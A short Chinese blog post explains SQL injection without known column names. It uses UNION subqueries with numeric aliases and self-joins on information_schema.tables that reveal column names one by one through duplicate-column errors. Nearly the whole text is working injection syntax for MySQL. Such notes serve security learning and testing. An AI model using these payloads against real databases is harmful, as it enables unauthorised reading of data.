sql注入(利用join进行无列名注入)

select 1,2,3 union select * from sc;
select `1` from (select 1,2,3 union select * from sc)a;
select `2` from (select 1,2,3 union select * from sc)a;

select * from sc;

select 1,2,3 union select * from sc;

select `1` from (select 1,2,3 union select * from sc)a;

join 报错来爆列名

select * from sc union all select * from (select * from information_schema.tables as a join information_schema.tables b)c;

得到第一列列名 table_catalog

select * from sc union all select * from (select * from information_schema.tables as a join information_schema.tables b using(table_catalog))c;

得到第二列列名 table_schema

select * from sc union all select * from (select * from information_schema.tables as a join information_schema.tables b using(table_catalog,table_schema))c;
可得第三列列名 依次枚举

posted @ 2019-11-30 15:04  时空-  阅读(2339)  评论(0编辑  收藏  举报